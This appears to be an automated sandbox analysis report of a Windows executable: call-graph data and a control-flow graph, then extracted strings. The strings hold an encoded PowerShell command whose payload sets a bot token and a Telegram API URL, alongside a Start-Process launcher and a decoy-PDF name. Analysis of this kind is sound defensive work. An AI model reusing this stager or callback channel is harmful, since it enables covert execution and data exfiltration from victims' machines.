14608->14612 14609 7ff73a40ff81 14610 7ff73a400688 _fread_nolock 11 API calls 14609->14610 14614 7ff73a40ff86 14610->14614 14617 7ff73a41008d GetLastError 14611->14617 14618 7ff73a4100de 14611->14618 14615 7ff73a41004d GetLastError 14612->14615 14620 7ff73a410013 CreateFileW 14612->14620 14616 7ff73a40ff6e 14613->14616 14619 7ff73a4006a8 _set_fmode 11 API calls 14614->14619 14621 7ff73a40061c _fread_nolock 11 API calls 14615->14621 14616->14572 14622 7ff73a40061c _fread_nolock 11 API calls 14617->14622 14677 7ff73a40c214 14618->14677 14619->14606 14620->14611 14620->14615 14621->14606 14623 7ff73a41009c CloseHandle 14622->14623 14623->14606 14624 7ff73a4100ce 14623->14624 14626 7ff73a4006a8 _set_fmode 11 API calls 14624->14626 14628 7ff73a4100d3 14626->14628 14628->14606 14629 7ff73a410154 14633 7ff73a41015b 14629->14633 14705 7ff73a40f84c 14629->14705 14701 7ff73a405e60 14633->14701 14634 7ff73a4101a1 14634->14616 14636 7ff73a410220 CloseHandle CreateFileW 14634->14636 14637 7ff73a410267 GetLastError 14636->14637 14638 7ff73a410295 14636->14638 14639 7ff73a40061c _fread_nolock 11 API calls 14637->14639 14638->14616 14640 7ff73a410274 14639->14640 14732 7ff73a40c43c 14640->14732 14643 7ff73a40faf8 14642->14643 14648 7ff73a40fb12 14642->14648 14644 7ff73a4006a8 _set_fmode 11 API calls 14643->14644 14643->14648 14645 7ff73a40fb07 14644->14645 14646 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 14645->14646 14646->14648 14647 7ff73a40fbe1 14650 7ff73a401f38 37 API calls 14647->14650 14658 7ff73a40fc3e 14647->14658 14649 7ff73a40fb90 14648->14649 14654 7ff73a4006a8 _set_fmode 11 API calls 14648->14654 14649->14647 14651 7ff73a4006a8 _set_fmode 11 API calls 14649->14651 14652 7ff73a40fc3a 14650->14652 14653 7ff73a40fbd6 14651->14653 14655 7ff73a40fcbc 14652->14655 14652->14658 14656 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 14653->14656 14657 7ff73a40fb85 14654->14657 14659 7ff73a3ff778 _invalid_parameter_noinfo_noreturn 17 API calls 14655->14659 14656->14647 14660 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 14657->14660 14658->14602 14658->14603 14661 7ff73a40fcd1 14659->14661 14660->14649 14663 7ff73a3fff30 BuildCatchObjectHelperInternal EnterCriticalSection 14662->14663 14669 7ff73a40c31f 14663->14669 14664 7ff73a40c348 14666 7ff73a40c04c 17 API calls 14664->14666 14665 7ff73a3fff84 BuildCatchObjectHelperInternal LeaveCriticalSection 14667 7ff73a40c41d 14665->14667 14668 7ff73a40c34d 14666->14668 14667->14608 14667->14609 14672 7ff73a40c36b 14668->14672 14673 7ff73a40c1ec _fread_nolock EnterCriticalSection 14668->14673 14669->14664 14670 7ff73a40c39e EnterCriticalSection 14669->14670 14669->14672 14671 7ff73a40c3ad LeaveCriticalSection 14670->14671 14670->14672 14671->14669 14672->14665 14673->14672 14675 7ff73a404aa4 _set_fmode 11 API calls 14674->14675 14676 7ff73a400691 14675->14676 14676->14606 14678 7ff73a40c237 14677->14678 14679 7ff73a40c2a2 14677->14679 14678->14679 14685 7ff73a40c263 14678->14685 14680 7ff73a4006a8 _set_fmode 11 API calls 14679->14680 14681 7ff73a40c2a7 14680->14681 14682 7ff73a400688 _fread_nolock 11 API calls 14681->14682 14683 7ff73a40c295 14682->14683 14683->14629 14686 7ff73a40fcd4 14683->14686 14684 7ff73a40c28c SetStdHandle 14684->14683 14685->14683 14685->14684 14687 7ff73a40fd0b 14686->14687 14688 7ff73a40fd3b 14686->14688 14687->14688 14689 7ff73a408120 _fread_nolock 39 API calls 14687->14689 14688->14629 14690 7ff73a40fd20 14689->14690 14691 7ff73a40fd29 14690->14691 14692 7ff73a40fd3f 14690->14692 14693 7ff73a400688 _fread_nolock 11 API calls 14691->14693 14694 7ff73a407a60 _fread_nolock 49 API calls 14692->14694 14695 7ff73a40fd2e 14693->14695 14696 7ff73a40fd56 14694->14696 14695->14688 14698 7ff73a4006a8 _set_fmode 11 API calls 14695->14698 14697 7ff73a40fd6c 14696->14697 14700 7ff73a411364 71 API calls 14696->14700 14697->14695 14699 7ff73a408120 _fread_nolock 39 API calls 14697->14699 14698->14688 14699->14695 14700->14697 14702 7ff73a405e90 14701->14702 14703 7ff73a405ef8 40 API calls 14702->14703 14704 7ff73a405ea9 14703->14704 14704->14616 14706 7ff73a40f89d 14705->14706 14724 7ff73a40f9c5 14705->14724 14707 7ff73a401f38 37 API calls 14706->14707 14712 7ff73a40f8bc 14706->14712 14708 7ff73a40f8b4 14707->14708 14709 7ff73a40fab7 14708->14709 14708->14712 14710 7ff73a3ff778 _invalid_parameter_noinfo_noreturn 17 API calls 14709->14710 14711 7ff73a40facb 14710->14711 14714 7ff73a40f96e 14712->14714 14715 7ff73a408120 _fread_nolock 39 API calls 14712->14715 14712->14724 14730 7ff73a40f9ba 14712->14730 14713 7ff73a407a60 _fread_nolock 49 API calls 14719 7ff73a40f9ec 14713->14719 14716 7ff73a405828 69 API calls 14714->14716 14714->14724 14729 7ff73a40f9c0 14714->14729 14717 7ff73a40f9a8 14715->14717 14716->14714 14717->14714 14723 7ff73a40f9ad 14717->14723 14718 7ff73a4006a8 _set_fmode 11 API calls 14718->14724 14720 7ff73a40fa4e 14719->14720 14721 7ff73a40fa28 14719->14721 14722 7ff73a40fa1b 14719->14722 14719->14724 14719->14729 14725 7ff73a408120 _fread_nolock 39 API calls 14720->14725 14721->14720 14728 7ff73a40fa31 14721->14728 14726 7ff73a4006a8 _set_fmode 11 API calls 14722->14726 14727 7ff73a408120 _fread_nolock 39 API calls 14723->14727 14724->14633 14724->14634 14725->14729 14726->14729 14727->14730 14731 7ff73a408120 _fread_nolock 39 API calls 14728->14731 14729->14718 14729->14724 14730->14713 14730->14724 14730->14729 14731->14729 14733 7ff73a40c458 14732->14733 14734 7ff73a40c4ca 14732->14734 14733->14734 14739 7ff73a40c48b 14733->14739 14735 7ff73a4006a8 _set_fmode 11 API calls 14734->14735 14736 7ff73a40c4cf 14735->14736 14737 7ff73a400688 _fread_nolock 11 API calls 14736->14737 14738 7ff73a40c4bc 14737->14738 14738->14638 14739->14738 14740 7ff73a40c4b4 SetStdHandle 14739->14740 14740->14738 14742 7ff73a3ff06a 14741->14742 14743 7ff73a3ff02a 14741->14743 14742->14743 14744 7ff73a3ff076 14742->14744 14745 7ff73a3ff65c _invalid_parameter_noinfo 37 API calls 14743->14745 14752 7ff73a3fe43c EnterCriticalSection 14744->14752 14747 7ff73a3ff051 14745->14747 14747->14505 14754 7ff73a3fdf6b 14753->14754 14755 7ff73a3fdf99 14753->14755 14756 7ff73a3ff65c _invalid_parameter_noinfo 37 API calls 14754->14756 14758 7ff73a3fdf8b 14755->14758 14763 7ff73a3fe43c EnterCriticalSection 14755->14763 14756->14758 14758->14509 14759 7ff73a3fdfb0 14760 7ff73a3fdfcc 72 API calls 14759->14760 14761 7ff73a3fdfbc 14760->14761 14762 7ff73a3fe448 _fread_nolock LeaveCriticalSection 14761->14762 14762->14758 14765 7ff73a3f62bc 14764->14765 14779 7ff73a3f593e 14764->14779 14766 7ff73a3f7e98 std::_Facet_Register 39 API calls 14765->14766 14765->14779 14767 7ff73a3f62cf 14766->14767 14768 7ff73a3f6e4c std::_Lockit::_Lockit 6 API calls 14767->14768 14769 7ff73a3f6300 14768->14769 14770 7ff73a3f63f6 14769->14770 14771 7ff73a3f633c 14769->14771 14772 7ff73a3f7044 39 API calls 14770->14772 14773 7ff73a3f7374 std::_Locinfo::_Locinfo_ctor 80 API calls 14771->14773 14774 7ff73a3f6402 14772->14774 14775 7ff73a3f6348 14773->14775 14780 7ff73a3f73e0 14775->14780 14777 7ff73a3f6363 __vcrt_freefls 14778 7ff73a3f6ec4 std::_Lockit::~_Lockit LeaveCriticalSection 14777->14778 14778->14779 14779->14371 14779->14372 14781 7ff73a3f73f4 14780->14781 14782 7ff73a3f73ed 14780->14782 14781->14777 14783 7ff73a4002a8 std::_Locinfo::_Locinfo_ctor 80 API calls 14782->14783 14783->14781 14785 7ff73a3f5350 14784->14785 14786 7ff73a3f52ce 14784->14786 14788 7ff73a3f7e70 _log10_special 8 API calls 14785->14788 14805 7ff73a3f49d0 14786->14805 14790 7ff73a3f537e 14788->14790 14790->14101 14791 7ff73a3f533d 14791->14785 14792 7ff73a3f53f0 81 API calls 14791->14792 14792->14785 14793 7ff73a3f5393 14794 7ff73a3f1e40 81 API calls 14793->14794 14795 7ff73a3f53d5 14794->14795 14796 7ff73a3f9d80 Concurrency::cancel_current_task 2 API calls 14795->14796 14797 7ff73a3f53e6 14796->14797 14799 7ff73a3f5439 14798->14799 14800 7ff73a3f5407 14798->14800 14799->14104 14800->14799 14801 7ff73a3f1e40 81 API calls 14800->14801 14802 7ff73a3f547f 14801->14802 14803 7ff73a3f9d80 Concurrency::cancel_current_task 2 API calls 14802->14803 14804 7ff73a3f5490 14803->14804 14806 7ff73a3f49f9 14805->14806 14807 7ff73a3f4a0e 14806->14807 14808 7ff73a3f5290 81 API calls 14806->14808 14807->14791 14807->14793 14808->14807 14810 7ff73a3f4b53 14809->14810 14811 7ff73a3f4c02 14809->14811 14810->14811 14812 7ff73a3f4b5d 14810->14812 14813 7ff73a3f7e70 _log10_special 8 API calls 14811->14813 14817 7ff73a3f4ba1 14812->14817 14819 7ff73a3fe7c4 14812->14819 14814 7ff73a3f4c11 14813->14814 14814->14115 14815 7ff73a3f7e70 _log10_special 8 API calls 14816 7ff73a3f4bbe 14815->14816 14816->14115 14817->14815 14820 7ff73a3fe7f4 14819->14820 14823 7ff73a3fe514 14820->14823 14822 7ff73a3fe812 14822->14817 14824 7ff73a3fe534 14823->14824 14825 7ff73a3fe561 14823->14825 14824->14825 14826 7ff73a3fe53e 14824->14826 14827 7ff73a3fe569 14824->14827 14825->14822 14828 7ff73a3ff65c _invalid_parameter_noinfo 37 API calls 14826->14828 14830 7ff73a3fe454 14827->14830 14828->14825 14837 7ff73a3fe43c EnterCriticalSection 14830->14837 14843 7ff73a3f6884 14838->14843 14849 7ff73a3f69e5 14838->14849 14839 7ff73a3f1230 39 API calls 14841 7ff73a3f69eb 14839->14841 14840 7ff73a3f68dd 14842 7ff73a3f7e98 std::_Facet_Register 39 API calls 14840->14842 14845 7ff73a3f69df 14840->14845 14850 7ff73a3f68d0 ctype __scrt_get_show_window_mode 14842->14850 14843->14840 14844 7ff73a3f6919 14843->14844 14843->14850 14846 7ff73a3f7e98 std::_Facet_Register 39 API calls 14844->14846 14847 7ff73a3f1190 Concurrency::cancel_current_task 39 API calls 14845->14847 14846->14850 14847->14849 14848 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 14848->14845 14849->14839 14850->14848 14851 7ff73a3f6988 ctype __scrt_get_show_window_mode 14850->14851 14851->14173 14853 7ff73a3f46a0 14852->14853 14853->14853 14854 7ff73a3f5cb0 39 API calls 14853->14854 14855 7ff73a3f2875 14854->14855 14856 7ff73a3f2140 14855->14856 14859 7ff73a3f1340 14856->14859 14858 7ff73a3f2168 14876 7ff73a3f46c0 14859->14876 14861 7ff73a3f1380 14862 7ff73a3f13aa 14861->14862 14863 7ff73a3f51a0 39 API calls 14861->14863 14864 7ff73a3f51a0 39 API calls 14862->14864 14863->14862 14865 7ff73a3f13e7 14864->14865 14866 7ff73a3f9b3c __std_exception_copy 37 API calls 14865->14866 14875 7ff73a3f1518 14865->14875 14867 7ff73a3f149c 14866->14867 14870 7ff73a3f1513 14867->14870 14871 7ff73a3f14da 14867->14871 14868 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 14874 7ff73a3f151e __std_exception_destroy 14868->14874 14869 7ff73a3f7e70 _log10_special 8 API calls 14872 7ff73a3f1500 14869->14872 14873 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 14870->14873 14871->14869 14872->14858 14873->14875 14874->14858 14875->14868 14879 7ff73a3f46ee 14876->14879 14877 7ff73a3f47cd 14878 7ff73a3f1230 39 API calls 14877->14878 14881 7ff73a3f47d3 14878->14881 14879->14877 14880 7ff73a3f473a 14879->14880 14882 7ff73a3f470a ctype 14879->14882 14885 7ff73a3f4792 14879->14885 14884 7ff73a3f7e98 std::_Facet_Register 39 API calls 14880->14884 14888 7ff73a3f47c7 14880->14888 14883 7ff73a3f40a0 79 API calls 14881->14883 14882->14861 14886 7ff73a3f47f4 14883->14886 14887 7ff73a3f4750 14884->14887 14889 7ff73a3f7e98 std::_Facet_Register 39 API calls 14885->14889 14886->14861 14887->14882 14891 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 14887->14891 14890 7ff73a3f1190 Concurrency::cancel_current_task 39 API calls 14888->14890 14889->14882 14890->14877 14891->14888 14893 7ff73a40492c __std_fs_code_page 45 API calls 14892->14893 14894 7ff73a4039bd 14893->14894 14895 7ff73a3ffe88 BuildCatchObjectHelperInternal 45 API calls 14894->14895 14896 7ff73a4039dd 14895->14896 16436 7ff73a3f3420 16437 7ff73a3f3433 16436->16437 16438 7ff73a3f345f 16436->16438 16437->16438 16441 7ff73a3fdee8 16437->16441 16442 7ff73a3fdef6 16441->16442 16443 7ff73a3fdefd 16441->16443 16447 7ff73a3fdd20 16442->16447 16445 7ff73a3f344f 16443->16445 16450 7ff73a3fdce0 16443->16450 16457 7ff73a3fdbfc 16447->16457 16465 7ff73a3fe43c EnterCriticalSection 16450->16465 16464 7ff73a3fff30 EnterCriticalSection 16457->16464 15664 7ff73a4023fc 15667 7ff73a4021c8 15664->15667 15674 7ff73a3fff30 EnterCriticalSection 15667->15674 15678 7ff73a4137fc 15679 7ff73a41380b 15678->15679 15680 7ff73a413815 15678->15680 15682 7ff73a3fff84 LeaveCriticalSection 15679->15682 15922 7ff73a3fe398 15923 7ff73a3fe3a3 15922->15923 15931 7ff73a406cac 15923->15931 15944 7ff73a3fff30 EnterCriticalSection 15931->15944 16011 7ff73a4047ac 16012 7ff73a4047b1 16011->16012 16013 7ff73a4047c6 16011->16013 16017 7ff73a4047cc 16012->16017 16018 7ff73a40480e 16017->16018 16021 7ff73a404816 16017->16021 16019 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16018->16019 16019->16021 16020 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16022 7ff73a404823 16020->16022 16021->16020 16023 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16022->16023 16024 7ff73a404830 16023->16024 16025 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16024->16025 16026 7ff73a40483d 16025->16026 16027 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16026->16027 16028 7ff73a40484a 16027->16028 16029 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16028->16029 16030 7ff73a404857 16029->16030 16031 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16030->16031 16032 7ff73a404864 16031->16032 16033 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16032->16033 16034 7ff73a404871 16033->16034 16035 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16034->16035 16036 7ff73a404881 16035->16036 16037 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16036->16037 16038 7ff73a404891 16037->16038 16043 7ff73a40467c 16038->16043 16057 7ff73a3fff30 EnterCriticalSection 16043->16057 17189 7ff73a3f3ec0 17192 7ff73a3f3eed 17189->17192 17197 7ff73a3f3ee6 17189->17197 17190 7ff73a3f7e70 _log10_special 8 API calls 17191 7ff73a3f4048 17190->17191 17194 7ff73a3f3fe7 17192->17194 17195 7ff73a3f3f73 17192->17195 17192->17197 17196 7ff73a3fe7c4 76 API calls 17194->17196 17194->17197 17195->17197 17198 7ff73a3fdac8 17195->17198 17196->17197 17197->17190 17199 7ff73a3fdaf8 17198->17199 17202 7ff73a3fd8f8 17199->17202 17201 7ff73a3fdb11 17201->17197 17203 7ff73a3fd953 17202->17203 17204 7ff73a3fd91e 17202->17204 17220 7ff73a3fe43c EnterCriticalSection 17203->17220 17205 7ff73a3ff65c _invalid_parameter_noinfo 37 API calls 17204->17205 17207 7ff73a3fd940 17205->17207 17207->17201 14897 7ff73a4015d0 14898 7ff73a4015e5 14897->14898 14899 7ff73a4015e9 14897->14899 14900 7ff73a40b8d8 66 API calls 14899->14900 14901 7ff73a4015ee 14900->14901 14912 7ff73a40bcc4 GetEnvironmentStringsW 14901->14912 14904 7ff73a4015fb 14907 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14904->14907 14905 7ff73a401607 14932 7ff73a401644 14905->14932 14907->14898 14909 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14910 7ff73a40162e 14909->14910 14911 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14910->14911 14911->14898 14913 7ff73a4015f3 14912->14913 14914 7ff73a40bcf4 14912->14914 14913->14904 14913->14905 14915 7ff73a40a370 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 14914->14915 14916 7ff73a40bd45 14915->14916 14917 7ff73a40bd4c FreeEnvironmentStringsW 14916->14917 14918 7ff73a408e50 std::_Locinfo::_Locinfo_ctor 12 API calls 14916->14918 14917->14913 14919 7ff73a40bd5f 14918->14919 14920 7ff73a40bd67 14919->14920 14921 7ff73a40bd70 14919->14921 14922 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14920->14922 14923 7ff73a40a370 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 14921->14923 14924 7ff73a40bd6e 14922->14924 14925 7ff73a40bd93 14923->14925 14924->14917 14926 7ff73a40bd97 14925->14926 14927 7ff73a40bda1 14925->14927 14929 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14926->14929 14928 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14927->14928 14930 7ff73a40bd9f FreeEnvironmentStringsW 14928->14930 14929->14930 14930->14913 14933 7ff73a401669 14932->14933 14934 7ff73a4062d4 __std_fs_code_page 11 API calls 14933->14934 14946 7ff73a40169f 14934->14946 14935 7ff73a4016a7 14936 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14935->14936 14937 7ff73a40160f 14936->14937 14937->14909 14938 7ff73a40171a 14939 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14938->14939 14939->14937 14940 7ff73a4062d4 __std_fs_code_page 11 API calls 14940->14946 14941 7ff73a401709 14951 7ff73a401754 14941->14951 14943 7ff73a4039e0 __std_exception_copy 37 API calls 14943->14946 14945 7ff73a40173f 14949 7ff73a3ff778 _invalid_parameter_noinfo_noreturn 17 API calls 14945->14949 14946->14935 14946->14938 14946->14940 14946->14941 14946->14943 14946->14945 14948 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14946->14948 14947 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14947->14935 14948->14946 14950 7ff73a401752 14949->14950 14952 7ff73a401711 14951->14952 14953 7ff73a401759 14951->14953 14952->14947 14954 7ff73a401782 14953->14954 14955 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14953->14955 14956 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14954->14956 14955->14953 14956->14952 16063 7ff73a3f3dd0 16065 7ff73a3f3deb 16063->16065 16064 7ff73a3f3e01 16065->16064 16067 7ff73a3fec48 16065->16067 16068 7ff73a3fec61 16067->16068 16069 7ff73a3fec7f 16067->16069 16071 7ff73a4006a8 _set_fmode 11 API calls 16068->16071 16079 7ff73a3fe43c EnterCriticalSection 16069->16079 16072 7ff73a3fec66 16071->16072 16074 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 16072->16074 16078 7ff73a3fec71 16074->16078 16078->16064 17254 7ff73a3f38d0 17255 7ff73a3f38e8 17254->17255 17259 7ff73a3f38f4 ctype 17254->17259 17256 7ff73a3f3905 ctype 17257 7ff73a3f3a3e 17257->17256 17260 7ff73a3fef38 _fread_nolock 53 API calls 17257->17260 17259->17256 17259->17257 17261 7ff73a3fef38 17259->17261 17260->17256 17264 7ff73a3fef58 17261->17264 17265 7ff73a3fef82 17264->17265 17266 7ff73a3fef50 17264->17266 17265->17266 17267 7ff73a3fef91 __scrt_get_show_window_mode 17265->17267 17268 7ff73a3fefce 17265->17268 17266->17259 17271 7ff73a4006a8 _set_fmode 11 API calls 17267->17271 17277 7ff73a3fe43c EnterCriticalSection 17268->17277 17273 7ff73a3fefa6 17271->17273 17275 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 17273->17275 17275->17266

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 7ff73a3f28c0-7ff73a3f2969 call 7ff73a3f5db0 call 7ff73a3f6d0c call 7ff73a3f4590 7 7ff73a3f297e-7ff73a3f298a 0->7 8 7ff73a3f296b-7ff73a3f297c 0->8 9 7ff73a3f2991-7ff73a3f29ac 7->9 8->9 10 7ff73a3f32b6-7ff73a3f32c7 call 7ff73a3f2850 9->10 11 7ff73a3f29b2-7ff73a3f29ed call 7ff73a3f6af4 9->11 16 7ff73a3f32c8-7ff73a3f32cd call 7ff73a3f1660 10->16 17 7ff73a3f2a61-7ff73a3f2ab9 call 7ff73a3f51a0 11->17 18 7ff73a3f29ef-7ff73a3f29f6 11->18 25 7ff73a3f32ce-7ff73a3f32d9 call 7ff73a3f19d0 16->25 27 7ff73a3f2aed-7ff73a3f2b08 17->27 28 7ff73a3f2abb-7ff73a3f2acd 17->28 18->16 20 7ff73a3f29fc-7ff73a3f2a1a call 7ff73a3f6b1c 18->20 20->25 32 7ff73a3f2a20-7ff73a3f2a5b call 7ff73a3f6620 call 7ff73a3f6b1c 20->32 43 7ff73a3f32da-7ff73a3f32e3 call 7ff73a3f19d0 25->43 29 7ff73a3f2b41-7ff73a3f2bab call 7ff73a412940 call 7ff73a3f4d20 27->29 30 7ff73a3f2b0a-7ff73a3f2b21 27->30 33 7ff73a3f2acf-7ff73a3f2ae2 28->33 34 7ff73a3f2ae8 call 7ff73a3f7e90 28->34 55 7ff73a3f2bad-7ff73a3f2bc0 call 7ff73a3f4370 call 7ff73a3f4c20 29->55 56 7ff73a3f2bf7-7ff73a3f2cb9 call 7ff73a3f5cb0 call 7ff73a3f5710 * 2 29->56 36 7ff73a3f2b23-7ff73a3f2b36 30->36 37 7ff73a3f2b3c call 7ff73a3f7e90 30->37 32->17 32->43 33->34 41 7ff73a3f32e4-7ff73a3f32e9 call 7ff73a3ff748 33->41 34->27 36->37 36->41 37->29 54 7ff73a3f32ea-7ff73a3f32ed 41->54 43->41 57 7ff73a3f32ef-7ff73a3f32f6 54->57 58 7ff73a3f32f8-7ff73a3f3309 54->58 70 7ff73a3f2bc5-7ff73a3f2bc8 55->70 77 7ff73a3f2d51-7ff73a3f2d65 call 7ff73a3f66c0 56->77 78 7ff73a3f2cbf-7ff73a3f2cce 56->78 61 7ff73a3f330d-7ff73a3f333d call 7ff73a3f1320 call 7ff73a3f1e40 call 7ff73a3f9d80 57->61 58->61 79 7ff73a3f333e-7ff73a3f3343 call 7ff73a3ff748 61->79 70->56 71 7ff73a3f2bca-7ff73a3f2bf1 70->71 71->54 71->56 89 7ff73a3f2d68-7ff73a3f2dae 77->89 81 7ff73a3f2cd3-7ff73a3f2ce4 78->81 82 7ff73a3f2cd0 78->82 85 7ff73a3f2ce6-7ff73a3f2ced 81->85 86 7ff73a3f2d04 81->86 82->81 85->86 90 7ff73a3f2cef-7ff73a3f2cf2 85->90 87 7ff73a3f2d09-7ff73a3f2d4f call 7ff73a4122a0 * 3 86->87 87->89 92 7ff73a3f2db0-7ff73a3f2de9 call 7ff73a4122a0 89->92 93 7ff73a3f2deb-7ff73a3f2e08 call 7ff73a3f59a0 89->93 94 7ff73a3f2cf4-7ff73a3f2cf7 90->94 95 7ff73a3f2cf9-7ff73a3f2d02 90->95 99 7ff73a3f2e0d-7ff73a3f2e57 call 7ff73a3f6410 92->99 93->99 94->87 95->87 106 7ff73a3f2e84-7ff73a3f2e9b call 7ff73a3f59a0 99->106 107 7ff73a3f2e59-7ff73a3f2e82 99->107 109 7ff73a3f2ea0-7ff73a3f2ee2 106->109 107->109 111 7ff73a3f2ee4-7ff73a3f2efb 109->111 112 7ff73a3f2f1b-7ff73a3f2f39 109->112 113 7ff73a3f2f16 call 7ff73a3f7e90 111->113 114 7ff73a3f2efd-7ff73a3f2f10 111->114 115 7ff73a3f2f3b-7ff73a3f2f54 112->115 116 7ff73a3f2f7c-7ff73a3f2f85 112->116 113->112 114->79 114->113 120 7ff73a3f2f56-7ff73a3f2f69 115->120 121 7ff73a3f2f6f-7ff73a3f2f74 call 7ff73a3f7e90 115->121 117 7ff73a3f2fc6-7ff73a3f2fda 116->117 118 7ff73a3f2f87-7ff73a3f2f9e 116->118 124 7ff73a3f2fdc-7ff73a3f2ff2 117->124 125 7ff73a3f301a-7ff73a3f302c 117->125 122 7ff73a3f2fa0-7ff73a3f2fb3 118->122 123 7ff73a3f2fb9-7ff73a3f2fbe call 7ff73a3f7e90 118->123 120->79 120->121 121->116 122->79 122->123 123->117 129 7ff73a3f2ff4-7ff73a3f3007 124->129 130 7ff73a3f300d-7ff73a3f3012 call 7ff73a3f7e90 124->130 131 7ff73a3f3064-7ff73a3f3100 CreateProcessW 125->131 132 7ff73a3f302e-7ff73a3f3044 125->132 129->79 129->130 130->125 133 7ff73a3f3125-7ff73a3f3130 131->133 134 7ff73a3f3102-7ff73a3f311f WaitForSingleObject CloseHandle * 2 131->134 137 7ff73a3f3046-7ff73a3f3059 132->137 138 7ff73a3f305f call 7ff73a3f7e90 132->138 140 7ff73a3f3132-7ff73a3f314b 133->140 141 7ff73a3f316b-7ff73a3f318e 133->141 134->133 137->79 137->138 138->131 143 7ff73a3f3166 call 7ff73a3f7e90 140->143 144 7ff73a3f314d-7ff73a3f3160 140->144 145 7ff73a3f31c4-7ff73a3f324c call 7ff73a3f40a0 call 7ff73a3f74d8 141->145 146 7ff73a3f3190-7ff73a3f31a4 141->146 143->141 144->143 147 7ff73a3f32b0-7ff73a3f32b5 call 7ff73a3ff748 144->147 158 7ff73a3f327e-7ff73a3f32af call 7ff73a3f7e70 145->158 159 7ff73a3f324e-7ff73a3f3262 145->159 149 7ff73a3f31a6-7ff73a3f31b9 146->149 150 7ff73a3f31bf call 7ff73a3f7e90 146->150 147->10 149->147 149->150 150->145 160 7ff73a3f3264-7ff73a3f3277 159->160 161 7ff73a3f3279 call 7ff73a3f7e90 159->161 160->147 160->161 161->158
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseHandle__std_fs_convert_wide_to_narrow$CreateErrorLastObjectProcessSingleWait__std_exception_copy__std_fs_code_page
                                                                                  • String ID: '; powershell.exe -e '$/file.pdf$JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$powershell.exe -Command "Start-Process '$|~fqVG
                                                                                  • API String ID: 1602825194-1633265721
                                                                                  • Opcode ID: 41be19a45a8101ab6089faecaffeac4cb2b4cc33ac101a02d1ac3be11a66a440
                                                                                  • Instruction ID: 61b44bb8bf4f67c1336aabf4b9c4c3f4b45dd90c886b1dab52b9aa2c41491b74
                                                                                  • Opcode Fuzzy Hash: 41be19a45a8101ab6089faecaffeac4cb2b4cc33ac101a02d1ac3be11a66a440
                                                                                  • Instruction Fuzzy Hash: 7D52E576A29BC695FF10DF68D8423EDA3A1FB84798F805236DA5C07A99DF78D180D310

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
